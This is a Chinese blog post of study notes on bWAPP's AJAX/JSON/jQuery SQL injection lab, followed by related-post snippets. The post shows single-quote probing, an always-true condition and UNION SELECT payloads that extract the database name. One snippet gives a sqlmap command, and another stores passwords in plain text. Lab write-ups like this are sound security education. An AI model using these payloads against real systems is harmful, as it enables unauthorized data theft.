SQL Injection (AJAX/JSON/jQuery)

于 2021-09-18 02:36:09 发布
阅读量537 收藏
点赞数
分类专栏: bWAPP学习笔记 文章标签: ajax jquery sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40554015/article/details/120359411
版权

1.AJAX/JSON/jQuery

(1)AJAX

通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。

(2)JSON

JSON (JavaScript Object Notation) 是一种轻量级的数据交换格式。

是一种数据格式。

(3)jQuery

jQuery 是一个 JavaScript 库,使用jQuery不仅能够将原本需要很多JavaScript 码才能实现的功能缩减为几行代码,还提供了足够高速的性能,是每一个网站开发人员都应掌握的技能。

2.注入

先来抓个包:

在输入框里输入i 

 抓到的包:

第一行,title=i,改成 ' 看看:

sql报错了,猜测sql语句如下:

select * from 表名 where Title like '%".用户输入."%'

所以可以这么构造sql语句:

select * from 表名 where Title like '%"' or '"%

查询正确,所有电影都在

 

 在此基础上进行注入:

0' union select 1,2,3,4,5,6,7 '

得到2,3,4,5,一共4个可显示位

 爆库:

0' union select 1,database(),3,4,5,6,7 '

 

 后边就和GET/Search差不多了。

【bWAPP】SQL注入实战
正是修行时
12-16 1593
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
SSM框架增删改查和分页,ajax数据传导
08-25
在SSM项目中,可以使用jQuery、axios等库发送Ajax请求到Controller,Controller处理请求后返回JSON数据,前端JavaScript代码接收到数据后动态更新DOM,实现异步交互。 7. **user_t.sql、file.sql、tree**:这些文件...
基于jQuerySQL注入攻击防范实现
12-29
现今实现防止SQL 注入攻击主要是在服务器端实现, 实现的方法主要有基于正则表达式的输入验证、敏感字符的 改写、部分数据加密。上述方法的缺点主要体现在以下的几个方面, 其一, 服务端处理数据使系统资源被过分占用, 容易 造成服务器端拒绝服务; 其二, 编写动态网页的脚本语言多样化, 每种脚本对应一种防止SQL注入方法, 使程序不具有可 读性、标准性。文中着力解决基于服务器端处理SQL 注入攻击的缺陷, 故探寻了一种在客服端实现的基于jQuery 防止 SQL 注入攻击的方法, 其目的是使攻击在客服端就被拦截, 同时利用jQuery开放性的特点使w eb程序更具有可移植性。
bWAPP-SQLInjection-AJAXJSONjQuery
hee_mee的博客
09-21 266
zeroNIl
sql注入之AJAXSQL Injection (AJAX/JSON/jQuery)
weixin_34409822的博客
10-14 1794
2019独角兽企业重金招聘Python工程师标准>>> ...
php sql json防注入,sql注入之AJAXSQL Injection (AJAX/JSON/jQuery)
weixin_36268390的博客
03-13 346
sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))0x1网上搜下没有关于ajaxsql注入文章,这里简单写一下抛砖引玉。原理自己百度,这里简单说下:通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。0x2我这里用一个漏洞示例程序bWAPP来演示,先看下正常访问的情况:输...
AJAX/JSON/jQuery
cainiao_00001的博客
09-28 306
AJAX 主要作用 局部刷新和异步交互 什么是AJAX Asynchoronized javaScript And Xml 异步JS和XMl AJAX的技术构成 以JS 为主的操作语言; 以HTML为显示骨架;以css作为渲染手段; 以xml 和JSON作为数据传输格式; 请求和响应的核心对象 是 异步请求对象 类型是XML HttpRequest AJAX ...
SSH+JQuery插件+Mysql
10-19
6. 如果是更新或查询,结果可能被转换成JSON格式,然后通过Ajax响应回前端,JQuery插件或JavaScript代码处理并更新页面。 Test_unit可能是一个测试单元,可能包含了用于测试SSH+JQuery+Mysql集成的代码或者数据。在...
疯狂Ajax讲义+Spring+hiberante
02-10
4. **AJAX库和框架**:介绍了jQuery、Prototype等流行的AJAX库,以及如何使用它们简化AJAX开发。 5. **实战应用**:提供了多个实际案例,展示如何在实际项目中运用AJAX技术,如动态加载数据、表单无刷新提交等。 *...
SSH+jQuery完整开发包V2.5
10-23
**jQuery** 是一个JavaScript库,极大地简化了JavaScript的DOM操作、事件处理、动画效果以及Ajax交互。jQuery的核心功能包括选择器(用于快速定位HTML元素)、DOM操作(添加、删除、修改元素)、事件处理(绑定和...
jquery过滤特殊字符’,防sql注入的实现方法
11-22
今天写的代码给项目经理看了下,因为之前没有考虑sql注入的问题,然后在他测试我的code的时候,打了一个“’”,然后我的程序就挂了! 于是乎,我在网上找到了一个验证并过滤文本框的jquery! 先上图: PS:这里用@#测试,因为’太小了,都看不清楚了! 具体的jquery代码: [removed] $(document).ready(function() { //返回 $("#btnBack").click(function() { location.href = "${basePat
linux jsonsql注入,sql注入之AJAXSQL Injection (AJAX/JSON/jQuery)
weixin_39777242的博客
05-19 221
sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))0x1网上搜下没有关于ajaxsql注入文章,这里简单写一下抛砖引玉。原理自己百度,这里简单说下:通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。0x2我这里用一个漏洞示例程序bWAPP来演示,先看下正常访问的情况:输...
bWAPP-SQLInjection2
hee_mee的博客
09-20 171
zeroNil
bwapp 随笔
freshfox的博客
08-11 2171
SQL Injection (GET/Search) C:\Python27\sqlmap>python sqlmap.py  -u  "http://localhost/bwapp/sqli_1.php?titl e=sfsdf&action=search"  --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_
玩转Web之Json(二)----jquery easy ui + Ajax +Json+SQL实现前后台数据交互
iteye_8029的博客
03-14 194
最近在学Json,在网上也找过一些资料,觉得有点乱,在这里,我以easy ui的登录界面为例来说一下怎样用Json实现前后台的数据交互 使用Json,首先需要导入一些jar包,这些资源可以在网上下载到,然后导入到项目中即可。 首先我先把代码贴出来,有些地方会着重说明一下: 客户端代码如下: <%@page pageEncoding="utf-8"%> <!DOCTYPE ...
基于Jquery+Ajax+Json+高效分页
沉默的鲨鱼的专栏
04-21 4985
转载地址:http://www.cnblogs.com/Jusoc/archive/2011/08/28/2156530.html   为了保护原作者不辞辛苦的原创,所以原封不动的复制过来了   摘要 分页我相信大家存储过程分页已经很熟悉了,ajax更是耳熟能详了,更别说我们的json,等等。 如果说您没用过这些东东的话,我相信看完这篇博文会对您有帮助的,,如果有任何问
Ajax时代 SQL注入依然是隐患
weixin_33725270的博客
10-02 279
许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户,从而最终获得系统管理员权限。黑客可以利...
关于防止sql注入的几种手段(一)
weixin_34092370的博客
01-12 249
其实特别不愿意说sql注入的问题,因为这的确是个老掉牙的问题了,但是仍然还有不少人在这方面自以为安全性做得很到位,或者说万事只要存储过程就可以防止注入,即全都参数化,这样对于某些复杂逻辑来说,sql存储过程写法太过于冗长,不如在C#拼凑sql,也有很多人鄙视拼凑sql的人,我觉得,看待sql注入这个问题,应该是从本质上来杜绝注入,而不是想当然的依靠存储过程,拒绝拼凑sql。我说一下我自己的经验吧 ...
jquery过滤特殊字符',防sql注入
mituan1234567的专栏
06-18 898
http://blog.csdn.net/xb12369/article/details/8446248 今天写的代码给项目经理看了下,因为之前没有考虑sql注入的问题,然后在他测试我的code的时候,打了一个“'”,然后我的程序就挂了! 于是乎,我在网上找到了一个验证并过滤文本框的jquery! 先上图: PS:这里用@#测试,因为'太小了,都
使用Ajax注册在本地的服务器上创建一个mysql类型的数据库,叫register, 库中有一个名为user的数据表,包括以下字段:id(主键,自增), username, trueName, password, sex, age, favor, province, intro;创建一个html页面呈现用户注册表单,并对用户注册表单进行适当的美化,如各个表单元素对齐等;后台一个php页面,用于将注册数据的插入到数据库中。要求必须用jq ajax相关技术实现。结果保存到服务器个人文件夹里面,文件夹名称为学号+姓名。
最新发布
05-23
很抱歉,作为一个AI语言模型,我没有本地服务器和文件夹访问权限,无法为您提供完整的解决方案。但是,我可以为您提供一些可以参考的代码示例。 HTML页面代码示例: ``` <!DOCTYPE html> <html> <head> <title>User Registration</title> <link rel="stylesheet" href="style.css"> </head> <body> <h1>User Registration Form</h1> <form id="register-form"> <label>Username:</label> <input type="text" name="username" required><br> <label>True Name:</label> <input type="text" name="trueName" required><br> <label>Password:</label> <input type="password" name="password" required><br> <label>Gender:</label> <input type="radio" name="sex" value="male" required>Male <input type="radio" name="sex" value="female" required>Female<br> <label>Age:</label> <input type="number" name="age" required><br> <label>Favorite:</label> <input type="text" name="favor"><br> <label>Province:</label> <select name="province" required> <option value="">--Select Province--</option> <option value="Beijing">Beijing</option> <option value="Shanghai">Shanghai</option> <option value="Guangdong">Guangdong</option> <option value="Zhejiang">Zhejiang</option> </select><br> <label>Introduction:</label> <textarea name="intro"></textarea><br> <input type="submit" value="Register"> </form> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="script.js"></script> </body> </html> ``` CSS样式表代码示例(style.css): ``` label { display: inline-block; width: 100px; text-align: right; margin-right: 10px; } input[type="text"], input[type="password"], textarea { width: 200px; } select { width: 220px; } ``` JavaScript代码示例(script.js): ``` $(document).ready(function() { $("#register-form").submit(function(event) { event.preventDefault(); // prevent default form submission // serialize form data into JSON format var formData = JSON.stringify($(this).serializeArray()); // send AJAX request to server-side PHP script $.ajax({ url: "register.php", type: "POST", data: {formData: formData}, dataType: "json", success: function(response) { if (response.status == 1) { alert("Registration successful!"); $("#register-form")[0].reset(); // reset form after successful registration } else { alert("Registration failed: " + response.message); } }, error: function(jqXHR, textStatus, errorThrown) { alert("AJAX error: " + textStatus + " - " + errorThrown); } }); }); }); ``` PHP代码示例(register.php): ``` <?php // check if form data is received if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["formData"])) { // decode JSON data $formData = json_decode($_POST["formData"], true); // connect to MySQL database $servername = "localhost"; $username = "root"; $password = "password"; $dbname = "register"; $conn = mysqli_connect($servername, $username, $password, $dbname); // check connection if (!$conn) { die("Connection failed: " . mysqli_connect_error()); } // escape form data to prevent SQL injection $username = mysqli_real_escape_string($conn, $formData[0]["value"]); $trueName = mysqli_real_escape_string($conn, $formData[1]["value"]); $password = mysqli_real_escape_string($conn, $formData[2]["value"]); $sex = mysqli_real_escape_string($conn, $formData[3]["value"]); $age = mysqli_real_escape_string($conn, $formData[4]["value"]); $favor = mysqli_real_escape_string($conn, $formData[5]["value"]); $province = mysqli_real_escape_string($conn, $formData[6]["value"]); $intro = mysqli_real_escape_string($conn, $formData[7]["value"]); // insert form data into database $sql = "INSERT INTO user (username, trueName, password, sex, age, favor, province, intro) VALUES ('$username', '$trueName', '$password', '$sex', '$age', '$favor', '$province', '$intro')"; if (mysqli_query($conn, $sql)) { $response = array("status" => 1, "message" => "Registration successful!"); } else { $response = array("status" => 0, "message" => "Error: " . $sql . " - " . mysqli_error($conn)); } // close database connection mysqli_close($conn); // send JSON response back to client-side JavaScript header("Content-type: application/json"); echo json_encode($response); } ?>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值